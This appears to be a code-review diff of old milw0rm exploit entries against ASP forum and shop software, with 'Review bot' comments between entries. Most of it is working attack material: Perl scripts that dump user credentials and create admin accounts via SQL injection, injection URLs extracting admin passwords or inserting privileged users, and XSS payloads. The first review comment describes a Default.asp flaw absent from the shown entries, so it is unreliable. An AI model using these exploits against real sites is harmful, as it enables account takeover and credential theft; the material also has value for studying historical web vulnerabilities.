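Review bot: the success conditions rely on the injected `username` and `password` values being echoed verbatim into page markup (the `<link href="forum/...` and `bgcolor="NWPX" background="forum/...` regexes), and the fallback condition relies on the database's `number of columns` error text reaching the browser. Each is a separate weakness in how `Default.asp` handles the `Scheme` parameter: unparameterised SQL, unencoded output of database values into HTML, and verbose database errors returned to the client. `header()` records only `Remote SQL Injection`; the entry would serve defenders better if it listed all three, since the fixes (parameterised queries, output encoding, generic error pages) are independent and a site that patches only the query still leaks error detail. The `#googledork` line with its page count is a 2006 search-engine hit count that adds nothing verifiable and could be omitted.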


@ -1,77 +1,77 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver;
$asdir = $ARGV[1];
$asport = "80";
$astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp;
#Sending data...
header();
print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n";
print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n";
print $as "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n";
}
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n";
}
if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n";
}
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n";
}
if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
#nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
print "- <userid> -> ID of user that you want info ex: 1\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$asserver = $ARGV[0];
$asserver =~ s/(http:\/\/)//eg;
$ashost = "http://".$asserver;
$asdir = $ARGV[1];
$asport = "80";
$astar = "Haberler.asp?haber=devam&id=";
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
$asreq = $ashost.$asdir.$astar.$asxp;
#Sending data...
header();
print "- Trying to connect: $asserver\r\n";
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
print $as "GET $asreq HTTP/1.1\n";
print $as "Accept: */*\n";
print $as "Referer: $ashost\n";
print $as "Accept-Language: tr\n";
print $as "User-Agent: NukeZilla\n";
print $as "Cache-Control: no-cache\n";
print $as "Host: $asserver\n";
print $as "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$as>) {
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
if ($1 == $ARGV[2]) {
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
}
else { die "- Exploit failed\n"; }
}
if ($answer =~ /\" align=\"left\">(.*?)</) {
print "- Username: $1\r\n";
}
if ($answer =~ /Ekleyen&nbsp;&nbsp;\(<b>(.*?)<\/b>\)/) {
print "- MD5 HASH of PASSWORD: $1\r\n";
}
if ($answer =~ /\| (.*?) ]<br>/) {
print "- Regdate: $1\r\n";
}
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
print "- Email: $1\r\n";
}
if ($answer =~ / Okunma : (.*?) /) {
print "- MD5 hash of answer: $1\r\n";
exit();
}
}
#Exploit failed...
print "- Exploit failed\n"
}
#nukedx.com [2006-04-19]
# milw0rm.com [2006-04-19]
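Review bot: `usage()` prints `Usage: $0 <host> <path>` but the script exits unless `@ARGV` has exactly three elements, and both the `#Usage:` header and the following help line describe a third `<userid>` argument; the usage string should read `<host> <path> <userid>` to match. The entry should also state plainly what the `id` parameter of `Haberler.asp` exposes: the UNION pulls `cevap`, `kulladi`, `sifre`, `kayittarih` and `email` from `uyeler`, so the disclosure is the full profile (username, MD5 of the password, registration date, e-mail address and MD5 of the security answer) for any user ID, not only the password hash that the title implies.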


@ -1,18 +1,18 @@
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]
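Review bot: the header block should name the affected parameter and the precondition explicitly rather than leaving them to be inferred from the example URL: the injection point is the `id` parameter of `member.asp`, and `First you must be logged in` means the attack requires an authenticated forum account, which matters for severity rating. The example URL also mixes `%20` and `+` as space encodings within one query string; either works, but a consistent form is easier to turn into a log-search or WAF pattern.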


@ -1,30 +1,30 @@
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all
this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar
# milw0rm.com [2006-05-06]
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all
this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar
# milw0rm.com [2006-05-06]
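Review bot: the payload closes the `cid` string and then runs a second statement (`';insert into tbluser ... --`), so it only works against a database backend that accepts batched statements; the write-up should state which backend the author tested, because a triage analyst whose backend rejects stacked queries would wrongly conclude the installation is unaffected even though the string concatenation in `shopcurrency.asp` is still present. It would also help to spell out the impact: the `fldaccess` value `1,2,...,29` appears to enumerate every access level, so the created account is fully privileged, which is a stronger claim than "add user a/a" suggests and should be confirmed in the text.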


@ -1,21 +1,21 @@
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------
By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19]
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .
Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-------
By FarhadKey On 19 May 2006
# milw0rm.com [2006-05-19]
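Review bot: the description locates the flaw in `settings.asp` (`layid` parameter) while both proof-of-concept URLs request `login.asp` and `main.asp`; if `settings.asp` is an include that consumes `layid` on every page, say so, otherwise the file list is inconsistent and defenders grepping logs for the vulnerable script will look at the wrong one. The statement that successful exploitation returns the administrator's username and password `in clear text` is itself a second finding (plaintext credential storage in `adminLogins`) and deserves its own line under `Vulnerability:`. Minor: `not properly sanitised before being used` is missing its verb (`is not properly sanitised`).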


@ -1,11 +1,11 @@
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:
# Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26]
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# greetz : Nukedx,TheHacker
# Dork : "qjForum"
# Exploit:
# Login before injection.
### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# milw0rm.com [2006-05-26]
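Review bot: the title gives no affected version and the entry has no date other than the footer, so it is impossible to tell later whether a given release is fixed. `# Login before injection.` is a precondition (authenticated user) that should be stated as such in the header since it lowers the severity, and the `uName` parameter should be named alongside the file, as `qjForum(member.asp)` alone does not identify the injection point.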

View file

@ -1,49 +1,49 @@
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26]
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
TURKISH
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Aç... Bulan : ajann
# Aç.k bulunan dosyalar;
SQL INJECT.ON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26]
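Review bot: the Turkish `Sözcük[Arama]` (search term) line reads `"powered by phpmydirectory"`, a different product from the English dork `"Copyright 2004 easy-content forums"`, and looks copied from another advisory; the two halves should agree. The Turkish section is otherwise a translation of the English one plus a closing `Açıklama` (explanation) paragraph stating that missing input filtering in `userview.asp` and `topics.asp` lets SQL queries run and XSS code execute; its diacritics have been lost in encoding (`Ba.l.k`, `Aç.k`, `De.i.ken`), so the file should be re-saved as UTF-8. Since the XSS example reflects `forumname` unencoded into the page, the fix list is two-fold: parameterised queries for `catid` and `startletter`, and output encoding for `forumname`.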


@ -1,7 +1,7 @@
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27]
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27]
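Review bot: the example carries a second parameter, `Name=Allm%E4nt`, which appears to be a Latin-1 encoded forum name from the author's test installation rather than part of the injection; the entry should say the value is incidental so that it is not mistaken for a required magic value. The `adminlogins` table and `J_User`/`J_Pass` columns are the same names used in the Zix Forum entry earlier in this commit, which suggests a shared code base; cross-referencing the two would help anyone assessing either product. As with the other single-URL entries, version coverage and a date are missing from the header.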


@ -1,204 +1,204 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
